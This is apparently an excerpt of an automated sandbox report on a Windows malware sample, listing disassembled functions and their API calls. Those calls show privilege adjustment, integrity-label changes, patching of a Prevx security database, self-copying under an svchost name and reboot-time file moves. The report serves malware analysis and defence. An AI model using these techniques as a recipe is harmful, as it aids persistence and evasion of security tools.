                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00118271600304ABD724ABB69D49F9B7BA89F85755F044136FB09F62E1EB38DD00CA68
                                                                                                                                                                                                              Function 00402680 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 228commemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 296 402680-4026ac CoInitializeEx 297 4026ae-4026b1 296->297 298 4026bf-4026e7 GetModuleFileNameW SysAllocString 296->298 297->298 299 4026b3-4026b9 297->299 300 402869-40286f 298->300 301 4026ed-4026f8 SysAllocString 298->301 299->298 302 4028c4-4028c9 299->302 303 402871-402876 300->303 304 402879-40287e 300->304 305 402853-402861 SysFreeString 301->305 306 4026fe-40271f CoCreateInstance 301->306 303->304 309 402880-402885 304->309 310 402888-40288d 304->310 307 402863-402864 SysFreeString 305->307 308 402866 305->308 311 402725-40272a 306->311 312 402827-40282a 306->312 307->308 308->300 309->310 313 402897-40289c 310->313 314 40288f-402894 310->314 311->312 315 402730-402741 311->315 312->305 316 4028a6-4028ab 313->316 317 40289e-4028a3 313->317 314->313 315->305 321 402747-402758 315->321 319 4028b5-4028b7 316->319 320 4028ad-4028b2 316->320 317->316 322 4028b9-4028bc 319->322 323 4028be CoUninitialize 319->323 320->319 321->305 325 40275e-402768 321->325 322->302 322->323 323->302 326 40276d-40276f 325->326 326->305 327 402775-40277c 326->327 328 402851 327->328 329 402782-402793 327->329 328->305 329->328 331 402799-4027b1 329->331 333 4027b3-4027d3 CoCreateInstance 331->333 334 40282c-40283d 331->334 335 4027d5-4027da 333->335 336 4027dc 333->336 334->328 340 40283f-402843 334->340 335->336 337 4027de-4027e3 335->337 336->337 337->328 339 4027e5-4027f0 337->339 339->328 343 4027f2-402803 339->343 340->328 341 402845-40284e 340->341 341->328 343->328 345 402805-402814 343->345 345->328 347 402816-402825 345->347 347->328
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000002), ref: 0040269F
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026CD
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 004026E0
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(Windows Explorer), ref: 004026F2
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404E70,00000000,00004401,00404E80,?), ref: 0040271B
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404E90,00000000,00004401,00404EA0,?), ref: 004027CF
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00402DB5), ref: 0040285D
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00402864
                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 004028BE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                              • String ID: Windows Explorer
                                                                                                                                                                                                              • API String ID: 1140695583-228612681
                                                                                                                                                                                                              • Opcode ID: 8bb4e062025032df17ae7dd21582db741fec3b94b95eb974e8202e97bb420e09
                                                                                                                                                                                                              • Instruction ID: b52a01207190e4a30f96b10a649eeabca6697c1dd3b0d782d0755018a236c0da
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8bb4e062025032df17ae7dd21582db741fec3b94b95eb974e8202e97bb420e09
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E714175A006169FCB10EB99CD88DAFB7B9AF88300B24816AE504F73D0D7B5ED42CB54
                                                                                                                                                                                                              Function 00401E00 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 54threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                              • AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Token$CurrentOpenProcessThread$AdjustChangeCloseErrorFindLastLookupNotificationPrivilegePrivilegesValue
                                                                                                                                                                                                              • String ID: SeSecurityPrivilege
                                                                                                                                                                                                              • API String ID: 348569255-2333288578
                                                                                                                                                                                                              • Opcode ID: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                              • Instruction ID: 2f4dd94adce221d10feffccf969df1866f37505423b255349c6b180ac4db3a06
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92113CB6A00205ABE710DBE0DE0DFAF7B7CAB84B41F104129BB05F61D0D7749A04C7A9
                                                                                                                                                                                                              Function 00402360 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74filetimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023F6
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 00402416
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040241C
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040243A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040243D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                              • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                              • API String ID: 3225117150-898603304
                                                                                                                                                                                                              • Opcode ID: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                              • Instruction ID: f0829fbf90d271a43df41d43683be69a37a07176176bc6acbc5691eaf7b0b3d2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA31F2B1C0121CAFDB10DFD9D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95
                                                                                                                                                                                                              Function 00402A70 Relevance: 51.0, APIs: 22, Strings: 7, Instructions: 223memorylibraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(00401CB0,?,0000001C,00000000,00000000,7604DB30), ref: 00402AAB
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00402AC3
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 00402AE4
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00402AFC
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B3D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B4D
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00402B5E
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402B96
                                                                                                                                                                                                                • Part of subcall function 00401390: GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                                • Part of subcall function 00401390: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                                • Part of subcall function 00401390: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                                • Part of subcall function 00401420: GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                                • Part of subcall function 00401420: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                                • Part of subcall function 00401420: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00402C10
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00402C28
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 00402C5A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C85
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00402C88
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C94
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00402C97
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402CB6
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402CC5
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402CD5
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00402CE6
                                                                                                                                                                                                              • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D04
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402D15
                                                                                                                                                                                                              • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D20
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                              • String ID: %s_$.dat$IsWow64Process$Wed Jul 6 06:49:26 20111$\apppatch\$kernel32.dll$svchost.exe
                                                                                                                                                                                                              • API String ID: 4049655197-3112416296
                                                                                                                                                                                                              • Opcode ID: 66aefa0bda43174da8d304fb35afc24c9e162c35573b710bb5f0be43539d63f7
                                                                                                                                                                                                              • Instruction ID: 5ff553944d99263ee06e3162097b0b7c6440a9b95b570a66abc1ee1896f9e821
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66aefa0bda43174da8d304fb35afc24c9e162c35573b710bb5f0be43539d63f7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28716FB15043419BC710EF609E9C96BBBE8BBD8300F44493EF786B72A1DB749944CB99
                                                                                                                                                                                                              Function 004001CA Relevance: 25.0, APIs: 12, Strings: 1, Instructions: 2235fileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 173 4001ca-4001e3 175 4001e5-400258 173->175 176 400259 173->176 178 40025a-401011 175->178 176->178 182 401017-40101a 178->182 183 40113c-401141 178->183 182->183 184 401020-401022 182->184 184->183 185 401028-401044 CreateFileA 184->185 186 401139 185->186 187 40104a-401051 call 401e00 185->187 186->183 190 401053-401068 ConvertStringSecurityDescriptorToSecurityDescriptorW 187->190 191 4010aa-4010f3 SetFilePointer LockFile WriteFile UnlockFile 187->191 190->191 192 40106a-401089 GetSecurityDescriptorSacl 190->192 193 401105 191->193 194 4010f5-401103 SetEndOfFile 191->194 195 4010a0-4010a4 LocalFree 192->195 196 40108b-40109a SetNamedSecurityInfoA 192->196 197 401108-401111 193->197 194->193 194->197 195->191 196->195 198 401113-401120 GetHandleInformation 197->198 199 40112f-401136 197->199 198->199 200 401122-401126 198->200 200->199 201 401128-401129 FindCloseChangeNotification 200->201 201->199
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • Part of subcall function 00401E00: FindCloseChangeNotification.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 004010F6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401129
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorToken$ChangeCloseCurrentFindNotificationOpenProcessThread$AdjustConvertCreateErrorFreeHandleInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1779852708-820036962
                                                                                                                                                                                                              • Opcode ID: 81d4fb4f5fac3a8a28ffc8fda7917889cd3cc1cb556f91fb1df1ae6cc93ce86d
                                                                                                                                                                                                              • Instruction ID: e082a392c3e1c8ea6bcbabec48e58df7c8b9917df2aee0f20a935e5e0ee169a7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81d4fb4f5fac3a8a28ffc8fda7917889cd3cc1cb556f91fb1df1ae6cc93ce86d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4518E715093806FE7128B609D18BAA3FB99F47701F1941EBE680FA1E3D27C4D49C769
                                                                                                                                                                                                              Function 00402540 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040255C
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025C0
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025E3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 00402604
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402613
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 0040261F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040262E
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040263A
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402649
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402655
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402664
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00402667
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                              • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                              • API String ID: 606440919-2829233815
                                                                                                                                                                                                              • Opcode ID: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                              • Instruction ID: 8b448ea0795f31fda95dadee176b54ca291314fb6d6361d02f59f031212173a5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D93128716842187EF311EB90DC9AFEE7768EB89B00F104165F304AA1D0DBF16A45CBE9
                                                                                                                                                                                                              Function 004000F1 Relevance: 24.0, APIs: 12, Strings: 1, Instructions: 1300fileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 209 4000f1-4001e3 call 4001ca 214 4001e5-400258 209->214 215 400259 209->215 217 40025a-401011 214->217 215->217 221 401017-40101a 217->221 222 40113c-401141 217->222 221->222 223 401020-401022 221->223 223->222 224 401028-401044 CreateFileA 223->224 225 401139 224->225 226 40104a-401051 call 401e00 224->226 225->222 229 401053-401068 ConvertStringSecurityDescriptorToSecurityDescriptorW 226->229 230 4010aa-4010f3 SetFilePointer LockFile WriteFile UnlockFile 226->230 229->230 231 40106a-401089 GetSecurityDescriptorSacl 229->231 232 401105 230->232 233 4010f5-401103 SetEndOfFile 230->233 234 4010a0-4010a4 LocalFree 231->234 235 40108b-40109a SetNamedSecurityInfoA 231->235 236 401108-401111 232->236 233->232 233->236 234->230 235->234 237 401113-401120 GetHandleInformation 236->237 238 40112f-401136 236->238 237->238 239 401122-401126 237->239 239->238 240 401128-401129 FindCloseChangeNotification 239->240 240->238
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • Part of subcall function 00401E00: FindCloseChangeNotification.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 004010F6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401129
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorToken$ChangeCloseCurrentFindNotificationOpenProcessThread$AdjustConvertCreateErrorFreeHandleInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1779852708-820036962
                                                                                                                                                                                                              • Opcode ID: ed4ffb2dba8d29d9f73b1762ba96064b0f1017704a5a4d581a31cc202295fe74
                                                                                                                                                                                                              • Instruction ID: f59e5f2c9003a6e204812eb1f8c7eb33969ee6ba3e941ca0e7e6302637e7b3a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed4ffb2dba8d29d9f73b1762ba96064b0f1017704a5a4d581a31cc202295fe74
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9781346150E3C06FE7138B609C68B963FB49F57700F1A41EBE680EB1E3D26C4849C366
                                                                                                                                                                                                              Function 00401000 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121fileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 241 401000-401011 242 401017-40101a 241->242 243 40113c-401141 241->243 242->243 244 401020-401022 242->244 244->243 245 401028-401044 CreateFileA 244->245 246 401139 245->246 247 40104a-401051 call 401e00 245->247 246->243 250 401053-401068 ConvertStringSecurityDescriptorToSecurityDescriptorW 247->250 251 4010aa-4010f3 SetFilePointer LockFile WriteFile UnlockFile 247->251 250->251 252 40106a-401089 GetSecurityDescriptorSacl 250->252 253 401105 251->253 254 4010f5-401103 SetEndOfFile 251->254 255 4010a0-4010a4 LocalFree 252->255 256 40108b-40109a SetNamedSecurityInfoA 252->256 257 401108-401111 253->257 254->253 254->257 255->251 256->255 258 401113-401120 GetHandleInformation 257->258 259 40112f-401136 257->259 258->259 260 401122-401126 258->260 260->259 261 401128-401129 FindCloseChangeNotification 260->261 261->259
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
